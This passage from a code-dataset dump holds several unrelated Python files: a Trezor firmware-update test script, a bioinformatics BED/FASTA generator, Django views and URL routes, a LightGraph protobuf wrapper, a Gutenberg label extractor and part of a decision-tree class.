&\".format(version);\n trezor_poweroff();\n if \"1.8\" in version:\n touch(ser, \"left\", \"press\");\n else:\n touch(ser, \"all\", \"press\");\n wait(2);\n trezor_poweron();\n wait(2);\n touch(ser, \"all\", \"unpress\");\n print(\"[software/trezorctl] Updating the firmware to {}...\".format(version));\n os.system(trezorctlcmd);\n wait(3);\n touch(ser, \"right\", \"click\");\n wait(20);\n if unofficial: touch(ser, \"right\", \"click\");\n wait(10);\n trezor_poweroff();\n trezor_poweron();\n if unofficial: touch(ser, \"right\", \"click\");\n if unofficial: wait(5);\n if unofficial: touch(ser, \"right\", \"click\");\n wait(5);\n os.system(\"trezorctl get-features|grep version\");\n\ndef main():\n ser = serial.Serial(arduino_serial, 9600)\n update_firmware(ser, sys.argv[1]);\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"mmahut/tpmb","sub_path":"scripts/updatefw.py","file_name":"updatefw.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
+{"seq_id":"14850475972","text":"#!/usr/bin/python3\n\nimport json\nimport re\nfrom Bio.Data import CodonTable\nfrom Bio import SeqIO\nimport sys\nimport os\n\n\ndef make_bed_and_fasta(cand_list, frame_dic, genome, prot_dic, selection_file):\n bed_dic = {}\n fasta_dic = {}\n\n frame_color_dic = {}\n\n frame_color_dic[1] = \"255,26,26\"\n frame_color_dic[2] = \"26,26,255\"\n frame_color_dic[3] = \"45,185,45\"\n frame_color_dic[4] = \"172,0,230\"\n frame_color_dic[5] = \"230,115,0\"\n frame_color_dic[6] = \"0,230,184\"\n\n bed_temp = \"{0} {1} {2} {3} 0 {4} {1} {2} {5} 1 {6} 0 1 1\"\n track_description = ('track name=\"Candidates\" description=\"Candidate\"'\n 'visibility=2 itemRgb=\"On\"')\n translation_table = CodonTable.ambiguous_dna_by_id[11]\n\n start_regex = re.compile('|'.join(translation_table.start_codons))\n canno_start_regex = re.compile(\"ATG|ATB|ATD|ATH|ATK|ATM|ATN|ATR|ATS|ATV|\" +\n \"ATX|DTG|MTG|NTG|RTG|VTG|WTG|XTG\")\n as_regex = re.compile(\"[IL]\")\n for i, orf in enumerate(cand_list):\n species = orf.split(\"|\")[0]\n psms = prot_dic[\"SIHUMI\"][\"6frame\"][orf]\n\n strand = \"+\" if orf.split(\"|\")[3] == \"1\" else \"-\"\n start = int(orf.split(\"|\")[4].split(\"-\")[0])\n stop = int(orf.split(\"|\")[4].split(\"-\")[1])\n chrom = orf.split(\"|\")[1]\n protein_seq = frame_dic[orf].seq\n\n if strand == \"+\":\n nuc_seq = genome[species][chrom][start:stop].seq\n else:\n nuc_seq = genome[species][chrom][start:stop].seq.reverse_complement()\n trans = nuc_seq.translate()\n if str(trans) != str(protein_seq):\n print(\"error! 6frame not equal to genome\")\n print(orf)\n raise\n\n if \"*\" in trans:\n print(\"error! stop codon in translation\")\n print(orf)\n raise\n pep_starts = []\n\n pep_start_dic = {}\n for psm in psms:\n peptide = psm[\"pep\"]\n pep_seq_regex = as_regex.sub(\"[IL]\", peptide)\n starts = [m.start() for m in re.finditer(pep_seq_regex,\n str(protein_seq))]\n pep_start_dic[min(starts)] = peptide\n pep_starts += starts\n\n # start of startcodons\n canno_start_starts = []\n for m in re.finditer(canno_start_regex, str(nuc_seq)):\n if m.start() % 3 == 0:\n canno_start_starts.append(m.start())\n\n start_starts = []\n for m in re.finditer(start_regex, str(nuc_seq)):\n if m.start() % 3 == 0:\n start_starts.append(m.start())\n\n # calculate first start codon before mapped pep start\n min_start = min(pep_starts)\n '''\n for psm in psms:\n peptide = psm[\"pep\"]\n if peptide == pep_start_dic[min_start]:\n print(peptide)\n break\n '''\n # looks if a cannonical start exist if not take also alternatives,\n # if that does not exist 0 is assumed\n next_start_codon = max([start for start in canno_start_starts if start <=\n min_start * 3] + [-1])\n if next_start_codon < 0:\n next_start_codon = max([start for start in start_starts if start <=\n min_start * 3] + [0])\n '''\n print(next_start_codon)\n print(start_starts)\n print(canno_start_starts)\n print(min_start)\n '''\n if strand == \"+\":\n start = start + next_start_codon\n frame = start % 3 + 1\n else:\n stop = stop - next_start_codon\n frame = stop % 3 + 4\n rgb = frame_color_dic[frame]\n name = selection_file + \"_\" + str(i + 1)\n if strand == \"+\":\n cand_seq = genome[species][chrom][start:stop].seq.translate()\n else:\n cand_seq = genome[species][chrom][start:stop].seq.reverse_complement().translate()\n\n fasta_dic[name] = \">\" + name + \"\\n\" + str(cand_seq) + \"\\n\"\n if species not in bed_dic.keys():\n bed_dic[species] = [track_description]\n\n bed_dic[species].append(bed_temp.format(chrom, start, stop, name,\n 
strand, rgb, stop - start))\n\n return bed_dic, fasta_dic\n\n\ndef main():\n selection_cut_off = int(sys.argv[1])\n selection_file = \"nov_psm\" + str(selection_cut_off)\n\n with open(\"./parameters.json\", \"r\") as file_handle:\n data_dir = json.load(file_handle)['data_dir']\n\n with open(\"./SIHUMI_info_dic.json\", \"r\") as file_handle:\n SIHUMI_info_dic = json.load(file_handle)\n\n db_dir = data_dir + \"/dbs\"\n frame_path = db_dir + \"/SIHUMI_6frame.fasta\"\n frame_dic = SeqIO.index(frame_path, \"fasta\")\n\n genome_dir = data_dir + \"/genome\"\n genome = {}\n for genbank_file in os.listdir(genome_dir):\n if genbank_file.endswith(\".gbk\"):\n species = genbank_file.split(\".\")[0]\n genome_path = genome_dir + \"/\" + genbank_file\n genome[species] = SeqIO.to_dict(SeqIO.parse(genome_path, \"genbank\"))\n\n accu_data_dir = data_dir + \"/accumulated_data\"\n\n with open(accu_data_dir + \"/prot_dic.json\", \"r\") as file_handle:\n prot_dic = json.load(file_handle)\n\n cand_dir = data_dir + \"/candidates\"\n with open(cand_dir + \"/\" + selection_file + \"_list.json\", \"r\") as file_handler:\n cand_list = json.load(file_handler)\n\n bed_dic, fasta_dic = make_bed_and_fasta(cand_list, frame_dic, genome,\n prot_dic, selection_file)\n\n bed_dir = cand_dir + \"/bed_dir/\" + selection_file + \"/\"\n for species in SIHUMI_info_dic.keys():\n with open(bed_dir + species + \"_cand.bed\", \"w\") as file_handler:\n file_handler.write(\"\\n\".join(bed_dic[species]) + \"\\n\")\n\n blast_dir = cand_dir + \"/blast/{}/\".format(selection_file)\n for name, content in fasta_dic.items():\n with open(blast_dir + name + \".fasta\", \"w\") as file_handler:\n file_handler.write(content)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n'''\n'''\n","repo_name":"JohnBioinf/PROTMAP_scripts","sub_path":"candidates/make_bed_and_fasta.py","file_name":"make_bed_and_fasta.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71082188809","text":"from django.shortcuts import render,HttpResponseRedirect\nfrom .forms import LoginForm,TractorForm\nfrom .models import TractorDetail\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate,login,logout\nfrom .forms import MyUserCreationForm\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\ndef home_page(request):\n fm=TractorDetail.objects.all()\n return render(request,'app/tractorlist.html',{'form':fm})\n\ndef detail_page(request,pk):\n dt=TractorDetail.objects.filter(pk=pk)\n return render(request,'app/detail.html',{'data':dt})\n\ndef registration_page(request):\n if request.method==\"POST\":\n fm=MyUserCreationForm(request.POST)\n if fm.is_valid() :\n messages.success(request,'Congratulations You have registered ')\n fm.save()\n fm=MyUserCreationForm()\n else: \n fm=MyUserCreationForm()\n return render(request,'app/registration.html',{'form':fm})\n\ndef login_page(request):\n if request.method==\"POST\":\n fm=LoginForm(request,data=request.POST)\n if fm.is_valid():\n un=fm.cleaned_data['username']\n pa=fm.cleaned_data['password']\n User=authenticate(username=un,password=pa)\n if User is not None:\n login(request,User)\n return HttpResponseRedirect('/tractorreg/')\n else:\n fm=LoginForm()\n return render(request,'app/login.html',{'form':fm})\n \n@ login_required(login_url='/login/') \ndef tractorreg_page(request):\n if request.method==\"POST\":\n user=request.user\n fms=TractorForm(request.POST)\n if fms.is_valid():\n brand= fms.cleaned_data['brand']\n model_no= fms.cleaned_data['model_no']\n hp_category= fms.cleaned_data['hp_category']\n implements= fms.cleaned_data['implements']\n fm=TractorDetail(user=user,brand=brand,model_no=model_no,hp_category=hp_category,implements=implements)\n fm.save()\n messages.success(request,'Congratulations detail Updated Succefully ')\n fm=TractorForm()\n else:\n fm=TractorForm()\n return render(request,'app/tractorreg.html',{'form':fm,'active':'btn-primary'})\ndef logout_page(request):\n logout(request)\n return HttpResponseRedirect('/login/')\n\n ","repo_name":"yeshudeshmukh/tractorrecord","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"15211449756","text":"from lt_sdk.proto import lgf_pb2, node_filters, ops_pb2\n\n\nclass LightGraph(object):\n \"\"\"\n Wrapper around lgf_pb2.LGF() protobuf with some helper functions\n Immutable data type\n \"\"\"\n\n CONTROL_FLOW_OPS = {\n ops_pb2.ENTER,\n ops_pb2.SWITCH,\n ops_pb2.MERGE,\n ops_pb2.NEXT_ITERATION,\n ops_pb2.EXIT,\n }\n\n CONST_OPS = {\n ops_pb2.CONST,\n ops_pb2.VARIABLE,\n }\n\n CONST_NODES = {\n lgf_pb2.LNF.const.DESCRIPTOR.name,\n lgf_pb2.LNF.variable.DESCRIPTOR.name,\n }\n\n IS_CONST_ATTR = \"is_constant\"\n\n def __init__(self,\n nodes,\n input_edges=None,\n output_edges=None,\n output_node_names=None,\n meta_graph_info=None):\n \"\"\"\n Params:\n subgraphs: a list of lgf_pb2.LNF() protobufs\n input_edges: an optional list of lgf_pb2.EdgeInfo() protobufs\n output_edges: an optional list of lgf_pb2.EdgeInfo() protobufs\n output_nodes: a optional list of strings corresponding to output node names\n meta_graph_info: an optional lgf_pb2.MetaGraphInfo() protobuf\n \"\"\"\n input_edges = input_edges or []\n output_edges = output_edges or []\n output_node_names = output_node_names or []\n\n self._nodes = [self._copy_node(node) for node in nodes]\n self._input_edges = []\n input_names = set()\n for edge_info in input_edges:\n tup = (edge_info.name, edge_info.port)\n if tup not in input_names:\n input_names.add(tup)\n self._input_edges.append(self._copy_edge_info(edge_info))\n\n self._output_edges = [\n self._copy_edge_info(edge_info) for edge_info in output_edges\n ]\n self._output_node_names = list(output_node_names)\n\n if meta_graph_info is None:\n self._meta_graph_info = lgf_pb2.MetaGraphInfo()\n else:\n self._meta_graph_info = self._copy_meta_graph_info(meta_graph_info)\n\n # Dictionaries for fast lookups\n self._node_dict = {node.name: node for node in self._nodes}\n self._node_to_input_node_names = {node.name: set() for node in self._nodes}\n self._node_to_output_node_names = {node.name: set() for node in self._nodes}\n self._edge_dict = {}\n\n for node in self._nodes:\n # Input and output node names\n for e in node.inputs:\n if e.name in self._node_dict:\n self._node_to_input_node_names[node.name].add(e.name)\n self._node_to_output_node_names[e.name].add(node.name)\n for inp_name in node.control_inputs:\n if inp_name in self._node_dict:\n self._node_to_input_node_names[node.name].add(inp_name)\n self._node_to_output_node_names[inp_name].add(node.name)\n\n # Edges\n for e in list(node.inputs) + list(node.outputs):\n self._edge_dict[(e.name, e.port)] = e\n\n # Sort the input and output node names so they are always in the same order\n self._node_to_input_node_names = {\n k: sorted(v) for k,\n v in self._node_to_input_node_names.items()\n }\n self._node_to_output_node_names = {\n k: sorted(v) for k,\n v in self._node_to_output_node_names.items()\n }\n\n # Make sure required nodes are in the graph\n for node_name in self._meta_graph_info.required_nodes:\n if node_name not in self._node_dict:\n raise ValueError(\"Required node {} not found in graph\".format(node_name))\n\n def __eq__(self, other_graph):\n node_dict = self.node_dict()\n other_node_dict = other_graph.node_dict()\n\n if set(node_dict.keys()) != set(other_node_dict.keys()):\n return False\n\n return all(node_dict[name] == other_node_dict[name] for name in node_dict)\n\n def _copy_node(self, node):\n node_copy = lgf_pb2.LNF()\n node_copy.CopyFrom(node)\n return node_copy\n\n def _copy_edge_info(self, edge_info):\n edge_info_copy = lgf_pb2.EdgeInfo()\n edge_info_copy.CopyFrom(edge_info)\n return 
edge_info_copy\n\n def _copy_meta_graph_info(self, meta_graph_info):\n meta_graph_info_copy = lgf_pb2.MetaGraphInfo()\n meta_graph_info_copy.CopyFrom(meta_graph_info)\n return meta_graph_info_copy\n\n def nodes(self):\n \"\"\"\n Returns a list of nodes in the graph\n Always in the same order as the nodes used to initialize this object\n \"\"\"\n return [self._copy_node(node) for node in self._nodes]\n\n def node_dict(self):\n return {node.name: node for node in self.nodes()}\n\n def get_node_by_name(self, node_name):\n \"\"\"Returns the node in the graph with the given node_name.\"\"\"\n return self._copy_node(self._node_dict[node_name])\n\n def has_node(self, node_name):\n \"\"\"Returns True if there is a node with the given name\"\"\"\n return node_name in self._node_dict\n\n def get_edge(self, name, port):\n \"\"\"Returns an edge in the graph with the given name and port\"\"\"\n return self._copy_edge_info(self._edge_dict[(name, port)])\n\n def input_edges(self):\n \"\"\"\n Returns a list of lgf_pb2.InputInfo() protobufs specifying the inputs of\n the graph. Always in the same order as the inputs used to initialize this object\n \"\"\"\n return [self._copy_edge_info(edge_info) for edge_info in self._input_edges]\n\n def output_edges(self):\n \"\"\"\n Returns a list of lgf_pb2.OutputInfo() protobufs specifying the outputs of\n the graph. Always in the same order as the outputs used to initialize this object\n \"\"\"\n return [self._copy_edge_info(edge_info) for edge_info in self._output_edges]\n\n def output_node_names(self):\n \"\"\"\n Returns a list of strings corresponding to output nodes of the graph\n \"\"\"\n return list(self._output_node_names)\n\n def get_input_node_names_of_node(self, node):\n \"\"\"\n Returns a list of the input node names of the given node\n \"\"\"\n return list(self._node_to_input_node_names[node.name])\n\n def get_output_node_names_of_node(self, node):\n \"\"\"\n Returns a list of the output node names of the given node\n \"\"\"\n return list(self._node_to_output_node_names[node.name])\n\n def meta_graph_info(self):\n \"\"\"\n Returns a lgf_pb2.MetaGraphInfo() protobuf\n \"\"\"\n return self._copy_meta_graph_info(self._meta_graph_info)\n\n def prune_graph(self,\n input_edges=None,\n output_edges=None,\n output_node_names=None,\n include_inputs=True):\n \"\"\"Returns a new light_graph object.\"\"\"\n # Inputs and outputs of pruned graph are the same\n input_edges = input_edges or self.input_edges()\n output_edges = output_edges or self.output_edges()\n output_node_names = output_node_names or self.output_node_names()\n\n # Node filter for input nodes\n input_node_filter = node_filters.and_filter(*[\n node_filters.not_filter(node_filters.name_is_filter(e.name))\n for e in input_edges\n ])\n\n # Get the root nodes for pruning, include required nodes\n root_nodes = [self.get_node_by_name(e.name) for e in output_edges] + [\n self.get_node_by_name(node_name) for node_name in output_node_names\n ] + [\n self.get_node_by_name(node_name)\n for node_name in self._meta_graph_info.required_nodes\n ]\n\n # Only keep nodes that the outputs depend on\n nodes = []\n node_names = set()\n for i, root_node in enumerate(root_nodes):\n # Do not use the input node filter for required nodes\n if i < (len(output_edges) + len(output_node_names)):\n node_filter = input_node_filter\n else:\n node_filter = None\n\n for node in self.bfs(root_node, node_filter=node_filter):\n if node.name not in node_names:\n nodes.append(node)\n node_names.add(node.name)\n\n # Make sure inputs and 
outputs come from the original graph\n input_edges = [self.get_edge(e.name, e.port) for e in input_edges]\n output_edges = [self.get_edge(e.name, e.port) for e in output_edges]\n\n # Add input nodes if necessary\n if include_inputs:\n for e in input_edges:\n if e.name in self._node_dict and e.name not in node_names:\n nodes.append(self._node_dict[e.name])\n node_names.add(e.name)\n\n return LightGraph(nodes,\n input_edges=input_edges,\n output_edges=output_edges,\n output_node_names=output_node_names,\n meta_graph_info=self.meta_graph_info())\n\n def bfs(self,\n root_node,\n bidirectional=False,\n node_filter=None,\n skip_control_inputs=False):\n \"\"\"\n Does a BFS on the graph starting at the root_node\n\n Params:\n root_node: starting node for the BFS\n bidirectional: If False, look at a nodes inputs when doing the BFS and\n discovering new nodes. If True do a bidirectional search, looking at\n a nodes inputs and outputs when discovering new nodes.\n node_filter: If provided, only add nodes to the frontier that match the\n filter with this graph. Note that if the root_node does not match the\n provided filter, no nodes will be returned.\n \"\"\"\n # Check for unsupported cases\n if bidirectional and skip_control_inputs:\n raise ValueError(\"Bidirectional BFS is currently unsupported when\" +\n \"skipping control inputs\")\n\n # Update node filter with defaults\n default_filter = node_filters.not_filter(\n node_filters.name_starts_with_filter(\"^\"))\n if node_filter is None:\n node_filter = default_filter\n else:\n node_filter = node_filters.and_filter(default_filter, node_filter)\n\n # Special case when the root_node does not match node_filter\n if not (node_filter.matches(root_node, self)):\n return []\n\n # BFS\n visited_node_names = {root_node.name}\n current_nodes = [root_node]\n frontier = []\n while current_nodes:\n for parent_node in current_nodes:\n yield self._copy_node(parent_node)\n\n # Default uses inputs for child nodes\n if skip_control_inputs:\n # Skip control inputs\n child_nodes = [\n self._node_dict[e.name]\n for e in parent_node.inputs\n if self.has_node(e.name)\n ]\n else:\n # Include control inputs\n child_nodes = [\n self._node_dict[n]\n for n in self._node_to_input_node_names[parent_node.name]\n ]\n\n # Bidirectional adds outputs as well, currently always includes\n # control inputs\n if bidirectional:\n child_nodes += [\n self._node_dict[n]\n for n in self._node_to_output_node_names[parent_node.name]\n ]\n\n for child_node in child_nodes:\n if (child_node.name not in visited_node_names\n and node_filter.matches(child_node,\n self)):\n visited_node_names.add(child_node.name)\n frontier.append(child_node)\n\n current_nodes = frontier\n frontier = []\n\n @staticmethod\n def _is_const(node):\n if node.HasField(lgf_pb2.LNF.original.DESCRIPTOR.name):\n return node.original.op in LightGraph.CONST_OPS\n else:\n return node.WhichOneof(\"node\") in LightGraph.CONST_NODES\n\n def is_constant_node(self, node):\n \"\"\"\n Check whether a node is constant.\n\n A node is constant provided all of its non-control incoming inputs come from\n constant nodes.\n If a node has no inputs and self._is_const(node) is False, it is defined to be\n a non-constant node.\n If a node is a control flow op, it is defined to be a non-constant node unless\n it is an Enter node with the attribute is_constant == True.\n \"\"\"\n # Traverse the subtree rooted at node, skipping control inputs\n for child_node in self.bfs(node, skip_control_inputs=True):\n # Control flow ops not constant\n if 
(child_node.HasField(lgf_pb2.LNF.original.DESCRIPTOR.name)\n and child_node.original.op in self.CONTROL_FLOW_OPS):\n # Exception for constant enter node\n if child_node.original.op == ops_pb2.ENTER and child_node.original.attr[\n self.IS_CONST_ATTR].b:\n continue\n\n return False\n\n # Found a leaf of the subtree if\n # 1) The node has no non-control inputs\n # 2) The node has a non-control input edge that does not come from\n # a node inside the graph (an input edge to the graph)\n if (not len(child_node.inputs)\n or any([not self.has_node(e.name) for e in child_node.inputs])):\n # Found a non-constant leaf in the subtree\n if not self._is_const(child_node):\n return False\n\n return True\n\n def as_lgf_pb(self):\n \"\"\"\n Returns the Lightelligence Graph Format (LGF) Protobuf corresponding to\n this graph\n \"\"\"\n lgf_pb = lgf_pb2.LGF()\n lgf_pb.nodes.extend(self.nodes())\n lgf_pb.input_edges.extend(self.input_edges())\n lgf_pb.output_edges.extend(self.output_edges())\n lgf_pb.output_node_names.extend(self.output_node_names())\n lgf_pb.meta_graph_info.CopyFrom(self.meta_graph_info())\n\n return lgf_pb\n\n @classmethod\n def lgf_pb_to_graph(cls, lgf_pb):\n \"\"\"Converts a LGF Proto to a LightGraph object\"\"\"\n return cls(list(lgf_pb.nodes),\n list(lgf_pb.input_edges),\n list(lgf_pb.output_edges),\n list(lgf_pb.output_node_names),\n meta_graph_info=lgf_pb.meta_graph_info)\n\n @staticmethod\n def read_lgf_pb(lgf_pb_path):\n \"\"\"Reads a LGF Proto from the binary file at lgf_pb_path\"\"\"\n light_graph = lgf_pb2.LGF()\n with open(lgf_pb_path, \"rb\") as f:\n light_graph.ParseFromString(f.read())\n\n return light_graph\n\n @staticmethod\n def write_lgf_pb(lgf_pb, lgf_pb_path):\n \"\"\"Writes lgf_pb as a binary file to lgf_pb_path\"\"\"\n with open(lgf_pb_path, \"wb\") as f:\n f.write(lgf_pb.SerializeToString())\n\n @staticmethod\n def from_pb(lgf_pb_path):\n return LightGraph.lgf_pb_to_graph(LightGraph.read_lgf_pb(lgf_pb_path))\n\n\nclass MutableLightGraph(LightGraph):\n\n def get_node_by_name(self, node_name):\n \"\"\"Returns the node in the graph with the given node_name.\"\"\"\n return self._node_dict[node_name]\n","repo_name":"HermanYang/SDKDocs","sub_path":"lt_sdk/graph/lgf_graph.py","file_name":"lgf_graph.py","file_ext":"py","file_size_in_byte":15592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"45241471790","text":"from django.contrib import admin\r\nfrom django.urls import path,include\r\nfrom . import views\r\nfrom django.contrib.auth import views as auth_views\r\nfrom django.views.generic.base import RedirectView\r\n\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\nurlpatterns = [\r\n path('admin_home',views.home, name=\"home-page\"),\r\n path('login',views.login_view,name='login-page'),\r\n path('register',views.userregister,name='register-page'),\r\n path('save_register',views.save_register,name='register-user'),\r\n path('user_login',views.login_user,name='login-user'),\r\n path('home',views.home,name='home-page'),\r\n path('logout',views.logout_user,name='logout'),\r\n path('profile',views.profile,name='profile-page'),\r\n path('update_password',views.update_password,name='update-password'),\r\n path('update_profile',views.update_profile,name='update-profile'),\r\n path('users',views.users,name='user-page'),\r\n path('manage_user',views.manage_user,name='manage-user'),\r\n path('manage_user/',views.manage_user,name='manage-user-pk'),\r\n path('save_user',views.save_user,name='save-user'),\r\n path('delete_user/',views.delete_user,name='delete-user'),\r\n path('category',views.category,name='category-page'),\r\n path('manage_category',views.manage_category,name='manage-category'),\r\n path('manage_category/',views.manage_category,name='manage-category-pk'),\r\n path('view_category/',views.view_category,name='view-category-pk'),\r\n path('save_category',views.save_category,name='save-category'),\r\n path('delete_category/',views.delete_category,name='delete-category'),\r\n path('sub_category',views.sub_category,name='sub_category-page'),\r\n path('manage_sub_category',views.manage_sub_category,name='manage-sub_category'),\r\n path('manage_sub_category/',views.manage_sub_category,name='manage-sub_category-pk'),\r\n path('view_sub_category/',views.view_sub_category,name='view-sub_category-pk'),\r\n path('save_sub_category',views.save_sub_category,name='save-sub_category'),\r\n path('delete_sub_category/',views.delete_sub_category,name='delete-sub_category'),\r\n path('books',views.books,name='book-page'),\r\n path('manage_book',views.manage_book,name='manage-book'),\r\n path('manage_book/',views.manage_book,name='manage-book-pk'),\r\n path('view_book/',views.view_book,name='view-book-pk'),\r\n path('save_book',views.save_book,name='save-book'),\r\n path('delete_book/',views.delete_book,name='delete-book'),\r\n path('members',views.members,name='member-page'),\r\n path('manage_member',views.manage_member,name='manage-member'),\r\n path('manage_member/',views.manage_member,name='manage-member-pk'),\r\n path('view_member/',views.view_member,name='view-member-pk'),\r\n path('save_member',views.save_member,name='save-member'),\r\n path('delete_member/',views.delete_member,name='delete-member'),\r\n path('borrows',views.borrows,name='borrow-page'),\r\n path('manage_borrow',views.manage_borrow,name='manage-borrow'),\r\n path('manage_borrow/',views.manage_borrow,name='manage-borrow-pk'),\r\n path('view_borrow/',views.view_borrow,name='view-borrow-pk'),\r\n path('save_borrow',views.save_borrow,name='save-borrow'),\r\n path('delete_borrow/',views.delete_borrow,name='delete-borrow'),\r\n path(\"view_issued_book/\", views.view_issued_book, name=\"view_issued_book\"),\r\n\r\n ####chats\r\n path('ucchat/', views.UCreateChat.as_view(), name='ucchat'),\r\n path('ulchat/', views.UListChat.as_view(), name='ulchat'),\r\n \r\n path('acchat/', 
views.ACreateChat.as_view(), name='acchat'),\r\n path('alchat/', views.AListChat.as_view(), name='alchat'),\r\n\r\n\r\n path('Memberregister/',views.Memberregister, name='member_register'),\r\n\r\n\r\n\r\n\r\n #members\r\n path('',views.members_home,name=\"members-home\"),\r\n path('signup/', views.members_register, name='signup'),\r\n path('members_home',views.members_homepage,name=\"members-homepage\"),\r\n path('member_borrow',views.memberborrow,name='member-borrow-page'),\r\n path('member_details',views.MemberDetails_save,name=\"MemberDetails-save\"),\r\n path('view/',views.ViewMember,name='viewmember'),\r\n path('members_book_page',views.members_bookpage,name=\"members-book-page\"),\r\n path('transactions',views.Transaction,name=\"transaction\"),\r\n path('manage_transaction',views.manage_transaction,name='manage-transaction'),\r\n path('manage_transaction/',views.manage_transaction,name='manage-transaction-pk'),\r\n # path('view_transaction/',views.Transaction,name='view-transaction-pk'),\r\n path('save_transaction',views.save_transaction,name='save-transaction'),\r\n path('delete_transaction/',views.delete_transaction,name='delete-transaction'),\r\n path('fines',views.memberfine,name='fines'),\r\n path('collections',views.collections,name=\"collection\"),\r\n path('bookinfo',views.BookInfo,name=\"bookinfo\"),\r\n path(\"issued_books/\", views.issued_books, name=\"issued_books\"),\r\n\r\n\r\n\r\n\r\n]+ static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\r\n","repo_name":"ericdev-202/library","sub_path":"django_lms/lmsApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71374557768","text":"# extract *all* labels from project gutenberg\n\nfrom gutenberg.query import get_metadata\n\n# when running this code for the first time, you have to create a cache of the meta data. This may take some time\n# (according to the author of the package - compare https://pypi.org/project/Gutenberg/ -, it took 18hrs on his machine,\n# on mine it was less than 4 - I didn't check earlier, because I expected it would be around 18 as well.\n#\n# from gutenberg.acquire import get_metadata_cache\n#\n# cache = get_metadata_cache()\n# cache.populate()\n\n# list supported types of metadata\n# from gutenberg.query import list_supported_metadatas\n# print(list_supported_metadatas())\n\nresults = {}\n\nfor i in range(1, 57700):\n try:\n if get_metadata('language', i) == frozenset({'en'}):\n print(i)\n labels = get_metadata('subject', i)\n results[i] = labels\n except:\n print(\"extracting labels: Error at index \" + str(i) + \" probably no file with id \" + str(i) + \" was found. Skipped.\")\n with open(\"./log/label_extraction.txt\", 'a+') as logfile:\n logfile.write(\"extracting labels: Error at index \" + str(i) + \" probably no file with id \" + str(i) + \" was found. Skipped.\\n\")\n\npath = \"../data/labels.txt\"\nwith open(path, \"w\") as file:\n file.write(str(results))\n","repo_name":"Berndinio/AML_project","sub_path":"scripts/extract_labels.py","file_name":"extract_labels.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"3780340485","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nclass DecisionTree(object):\n \"\"\"Decision Tree.\n\n Implements the base class from which `ClassificationTree` and\n `RegressionTree` are built upon. All the functionality is defined in the\n base class `DecisionTree` except for evaluating a split and checking if a\n Leaf has been reached.\n\n Parameters\n ----------\n max_depth : int or None\n The maximum depth of the tree.\n \"\"\"\n def __init__(self, max_depth=None):\n self.max_depth = max_depth\n\n def fit(self, X, y):\n \"\"\"Fit a decision tree model to the data.\n\n Parameters\n ----------\n X : ndarray\n A matrix with the training data.\n y : ndarray\n A column vector with the true target values.\n\n Returns\n self\n \"\"\"\n self.root = self.partition(X, y)\n return self\n\n def predict(self, X, y=None):\n \"\"\"Predict the target for a data row `X`.\n\n Parameters\n ----------\n X : ndarray\n A data row of shape (n_features,).\n\n Returns\n -------\n pred : float or int\n Prediction for the data row `X`.\n \"\"\"\n pred = np.zeros(shape=(X.shape[0], 1))\n for i in range(X.shape[0]):\n pred[i] = self.traverse(X[i, :], self.root)\n return pred\n\n def traverse(self, X, node):\n \"\"\"Traverse the tree.\n\n Parameter\n ---------\n X : ndarray\n A single row of data.\n node: TreeNode instance\n The node should be the root of the tree.\n\n Returns\n -------\n pred : float\n The prediction for row `X`.\n \"\"\"\n if isinstance(node, Leaf):\n return node.pred\n if X[node.feature] <= node.split_val:\n return self.traverse(X, node.left_child)\n else:\n return self.traverse(X, node.right_child)\n\n def partition(self, X, y, depth=0):\n \"\"\"Partition the data.\n\n Parameters\n ----------\n X : ndarray\n A matrix with the data.\n y : ndarray\n A column vector with the true target values.\n depth : int\n The maximum depth of the tree to grow.\n\n Returns\n -------\n node : TreeNode instance\n A node which represents the root of the fitted tree.\n \"\"\"\n check = self.check_partition(y, depth)\n if isinstance(check, Leaf):\n return check\n\n feature, split_val = self.find_feature(X, y)\n X_left = X[X[:, feature] <= split_val]\n X_right = X[X[:, feature] > split_val]\n y_left = y[X[:, feature] <= split_val]\n y_right = y[X[:, feature] > split_val]\n\n node = TreeNode(feature, split_val, self.partition(X_left, y_left, depth+1),\n self.partition(X_right, y_right, depth+1))\n return node\n\n def find_feature(self, X, y):\n \"\"\"Find a feature to split.\n\n Parameters\n ----------\n X : ndarray\n y : ndarray\n\n Returns\n -------\n best_feature : int\n The index of the best feature to split.\n best_split : float\n The best value to split at.\n \"\"\"\n cost_low = np.inf\n best_feature = None\n best_split = None\n for i in range(X.shape[1]):\n cost, split_val = self.find_split(X[:, i], y)\n if cost < cost_low:\n best_feature = i\n best_split = split_val\n cost_low = cost\n return best_feature, best_split\n\n def find_split(self, feature, y):\n \"\"\"Find best split.\n\n Find the best split given the values for the provided feature.\n\n Parameters\n ----------\n feature : ndarray\n An column vector with the values for one feature. Should be of\n shape (m,).\n y : ndarray\n A column vector with the true labels for the column vector\n `feature`. 
